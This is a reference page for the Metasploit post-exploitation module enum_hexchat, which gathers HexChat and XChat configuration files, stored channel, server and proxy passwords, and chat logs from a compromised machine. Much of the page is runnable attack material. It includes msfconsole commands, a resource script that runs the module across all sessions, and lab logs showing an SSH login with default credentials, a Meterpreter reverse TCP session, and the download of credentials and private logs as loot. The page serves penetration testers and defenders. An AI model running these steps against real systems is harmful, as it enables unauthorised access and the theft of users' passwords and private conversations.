Linux Gather HexChat/XChat Enumeration - Metasploit


This page contains detailed information about how to use the post/multi/gather/enum_hexchat metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Linux Gather HexChat/XChat Enumeration
Module: post/multi/gather/enum_hexchat
Source code: modules/post/multi/gather/enum_hexchat.rb
Disclosure date: -
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will collect HexChat and XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/multi/gather/enum_hexchat

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/multi/gather/enum_hexchat
msf post(enum_hexchat) > show options
    ... show and set options ...
msf post(enum_hexchat) > set SESSION session-id
msf post(enum_hexchat) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/gather/enum_hexchat")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

This module enumerates the config and log files for XChat and HexChat. XChat was retired in 2015, although the site and downloads are still available in April 2020. It was forked and replaced by HexChat.

Linux xchat path:

 /home/[username]/.xchat2/
   * /home/[username]/.xchat2/servlist_.conf
   * /home/[username]/.xchat2/xchat.conf
   * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log

Linux hexchat path:

 /home/[username]/.config/hexchat/
   * /home/[username]/.config/hexchat/servlist.conf
   * /home/[username]/.config/hexchat/hexchat.conf
   * /home/[username]/.config/hexchat/logs/FreeNode/Freenode-#aha.log

Verification Steps

  1. Install the application(s)
  2. Start msfconsole
  3. Get a shell
  4. Do: use post/multi/gather/enum_hexchat
  5. Do: set session #
  6. Do: run
  7. You should get config and log files depending on your action

Actions

ALL

Download both config and chat logs. Default.

CHATS

Only download the chat logs.

CONFIGS

Only download teh config files.

Options

HEXCHAT

Gather the files from HexChat. Default true.

XCHAT

Gather the files from XCHat. Default false.

Scenarios

Hexchat 2.14.3 on Fedora 31



[*] Processing xchat.rb for ERB directives.
resource (xchat.rb)> use auxiliary/scanner/ssh/ssh_login
resource (xchat.rb)> set username fedora
username => fedora
resource (xchat.rb)> set password fedora
password => fedora
resource (xchat.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (xchat.rb)> run
[+] 2.2.2.2:22 - Success: 'fedora:fedora' ''
[*] Command shell session 1 opened (1.1.1.1:40023 -> 2.2.2.2:22) at 2020-04-22 07:17:59 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (xchat.rb)> use post/linux/gather/enum_hexchat
resource (xchat.rb)> set session -1
session => -1
resource (xchat.rb)> set verbose true
verbose => true
resource (xchat.rb)> run
[!] SESSION may not be compatible with this module.
[*] Detcted username: fedora
[+] Downloading: /home/fedora/.config/hexchat/servlist.conf
[+] Downloading: /home/fedora/.config/hexchat/hexchat.conf
[+] IRC nick: test14123251232151
[+] IRC nick1: test1251212123151
[+] IRC nick2: test123123123
[+] IRC nick3: test321321321
[+] Proxy conf: 1.1.1.1:9999 -> proxyusername/proxypass
[*] Downloading: /home/fedora/.config/hexchat//logs/freenode/freenode.log
[*] Downloading: /home/fedora/.config/hexchat//logs/freenode/#postgresql.log
[*] Downloading: /home/fedora/.config/hexchat//logs/freenode/#python-unregistered.log
[*] Downloading: /home/fedora/.config/hexchat//logs/freenode/server.log
[*] Downloading: /home/fedora/.config/hexchat//logs/NETWORK/server.log
[+] servlist.conf saved as /home/h00die/.msf4/loot/20200422071815_default_2.2.2.2_hexchat.config_359863.txt
[+] hexchat.conf saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.config_347758.txt
[+] freenode.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_364082.txt
[+] #postgresql.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_991489.txt
[+] #python-unregistered.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_760685.txt
[+] server.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_022702.txt
[+] server.log saved as /home/h00die/.msf4/loot/20200422071816_default_2.2.2.2_hexchat.chatlogs_433357.txt
[*] Post module execution completed

Hexchat 2.14.2 and XChat 2.8.9 on Windows 10



[*] Processing xchat_win.rb for ERB directives.
resource (xchat_win.rb)> use exploit/multi/handler
resource (xchat_win.rb)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (xchat_win.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (xchat_win.rb)> set lport 8888
lport => 8888
resource (xchat_win.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:8888 
[*] Sending stage (180291 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 3.3.3.3:51475) at 2020-04-22 10:30:29 -0400

meterpreter > background
[*] Backgrounding session 1...
resource (xchat_win.rb)> use post/multi/gather/enum_hexchat
resource (xchat_win.rb)> set session -1
session => -1
resource (xchat_win.rb)> set xchat true
xchat => true
resource (xchat_win.rb)> set verbose true
verbose => true
msf5 post(multi/gather/enum_hexchat) > rexploit
[*] Reloading module...

[!] SESSION may not be compatible with this module.
[+] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\servlist_.conf
[+] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\xchat.conf
[+] IRC nick: IEUser
[+] IRC nick1: IEUser
[+] IRC nick2: IEUser_
[+] IRC nick3: IEUser__
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-#xchat.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-ChatJunkies.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-server.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\NETWORK-server.log
[+] servlist_.conf saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.config_408737.txt
[+] xchat.conf saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.config_505296.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-#xchat.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_472281.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_133017.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-ChatJunkies.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_238039.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\ChatJunkies-server.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_482558.txt
[+] C:\Users\IEUser\AppData\Roaming\X-Chat 2\\xchatlogs\NETWORK-server.log saved as /home/h00die/.msf4/loot/20200422103218_default_3.3.3.3_xchat.chatlogs_379409.txt
[+] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\servlist.conf
[+] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\hexchat.conf
[+] IRC nick: IEUser
[+] IRC nick1: IEUser
[+] IRC nick2: IEUser_
[+] IRC nick3: IEUser__
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\#python-unregistered.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\freenode.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\server.log
[*] Downloading: C:\Users\IEUser\AppData\Roaming\HexChat\\logs\NETWORK\server.log
[+] servlist.conf saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.config_618512.txt
[+] hexchat.conf saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.config_765571.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\#python-unregistered.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_007334.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_199140.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\freenode.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_988553.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\freenode\server.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_851506.txt
[+] C:\Users\IEUser\AppData\Roaming\HexChat\\logs\NETWORK\server.log saved as /home/h00die/.msf4/loot/20200422103220_default_3.3.3.3_hexchat.chatlogs_819165.txt
[*] Post module execution completed

Go back to menu.

Msfconsole Usage

Here is how the multi/gather/enum_hexchat post exploitation module looks in the msfconsole:

msf6 > use post/multi/gather/enum_hexchat

msf6 post(multi/gather/enum_hexchat) > show info

       Name: Linux Gather HexChat/XChat Enumeration
     Module: post/multi/gather/enum_hexchat
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  sinn3r <[email protected]>
  h00die

Compatible session types:
  Meterpreter
  Shell

Available actions:
  Name     Description
  ----     -----------
  ALL      Collect both the configs and chat logs
  CHATS    Collect chat logs with a pattern
  CONFIGS  Collect config files

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  HEXCHAT  true             no        Enumerate hexchat
  SESSION                   yes       The session to run this module on.
  XCHAT    false            no        Enumerate xchat

Description:
  This module will collect HexChat and XChat's config files and chat 
  logs from the victim's machine. There are three actions you may 
  choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to 
  collect information such as channel settings, channel/server 
  passwords, etc. The CHATS option will simply download all the .log 
  files.

References:
  https://hexchat.readthedocs.io/en/latest/settings.html

Module Options

This is a complete list of options available in the multi/gather/enum_hexchat post exploitation module:

msf6 post(multi/gather/enum_hexchat) > show options

Module options (post/multi/gather/enum_hexchat):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HEXCHAT  true             no        Enumerate hexchat
   SESSION                   yes       The session to run this module on.
   XCHAT    false            no        Enumerate xchat

Post action:

   Name  Description
   ----  -----------
   ALL   Collect both the configs and chat logs

Advanced Options

Here is a complete list of advanced options supported by the multi/gather/enum_hexchat post exploitation module:

msf6 post(multi/gather/enum_hexchat) > show advanced

Module advanced options (post/multi/gather/enum_hexchat):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the multi/gather/enum_hexchat module can do:

msf6 post(multi/gather/enum_hexchat) > show actions

Post actions:

   Name     Description
   ----     -----------
   ALL      Collect both the configs and chat logs
   CHATS    Collect chat logs with a pattern
   CONFIGS  Collect config files

Evasion Options

Here is the full list of possible evasion options supported by the multi/gather/enum_hexchat post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(multi/gather/enum_hexchat) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to get username.

Here is a relevant code snippet related to the "Unable to get username." error message:

63:	      elsif datastore['XCHAT']
64:	        paths << "#{appdata}\\X-Chat 2\\"
65:	      end
66:	    else
67:	      user = whoami
68:	      fail_with(Failure::Unknown, 'Unable to get username.') if user.blank?
69:	      vprint_status("Detcted username: #{user}")
70:	
71:	      if mode == 'HEXCHAT'
72:	        # https://hexchat.readthedocs.io/en/latest/settings.html
73:	        paths << "/home/#{user}/.config/hexchat/"

Invalid mode: <MODE>

Here is a relevant code snippet related to the "Invalid mode: <MODE>" error message:

132:	    when 'XCHAT'
133:	      base_logs = "#{base}#{sep}xchatlogs"
134:	    when 'HEXCHAT'
135:	      base_logs = "#{base}#{sep}logs"
136:	    else
137:	      vprint_error("Invalid mode: #{mode}")
138:	      return logs
139:	    end
140:	    unless directory? base_logs
141:	      vprint_error("Chat logs not found at #{base_logs}")
142:	      return logs

Chat logs not found at <BASE_LOGS>

Here is a relevant code snippet related to the "Chat logs not found at <BASE_LOGS>" error message:

136:	    else
137:	      vprint_error("Invalid mode: #{mode}")
138:	      return logs
139:	    end
140:	    unless directory? base_logs
141:	      vprint_error("Chat logs not found at #{base_logs}")
142:	      return logs
143:	    end
144:	    list_logs(base_logs, mode).each do |l|
145:	      vprint_status("Downloading: #{l}")
146:	      data = read_file(l)

File not found: <CONF>

Here is a relevant code snippet related to the "File not found: <CONF>" error message:

200:	      files = ['servlist.conf', 'hexchat.conf']
201:	    end
202:	    files.each do |f|
203:	      conf = base + f
204:	      unless file? conf
205:	        vprint_error("File not found: #{conf}")
206:	        next
207:	      end
208:	      vprint_good("Downloading: #{conf}")
209:	      buf = read_file(conf)
210:	      next if buf.blank?

Please specify an action.

Here is a relevant code snippet related to the "Please specify an action." error message:

220:	
221:	    config
222:	  end
223:	
224:	  def run
225:	    fail_with(Failure::BadConfig, 'Please specify an action.') if action.nil?
226:	
227:	    if datastore['XCHAT']
228:	      get_paths('XCHAT').each do |base|
229:	        unless directory? base
230:	          print_error("XChat not installed or used by user. #{base} not found.")

XChat not installed or used by user. <BASE> not found.

Here is a relevant code snippet related to the "XChat not installed or used by user. <BASE> not found." error message:

225:	    fail_with(Failure::BadConfig, 'Please specify an action.') if action.nil?
226:	
227:	    if datastore['XCHAT']
228:	      get_paths('XCHAT').each do |base|
229:	        unless directory? base
230:	          print_error("XChat not installed or used by user. #{base} not found.")
231:	        end
232:	
233:	        configs = get_configs(base, 'XCHAT') if action.name =~ /ALL|CONFIGS/i
234:	        chatlogs = get_chatlogs(base, 'XCHAT') if action.name =~ /ALL|CHATS/i
235:

HexChat not installed or used by user. <BASE> not found.

Here is a relevant code snippet related to the "HexChat not installed or used by user. <BASE> not found." error message:

239:	    end
240:	
241:	    if datastore['HEXCHAT']
242:	      get_paths.each do |base|
243:	        unless directory? base
244:	          print_error("HexChat not installed or used by user. #{base} not found.")
245:	        end
246:	
247:	        configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i
248:	        chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i
249:

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • sinn3r
  • h00die

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.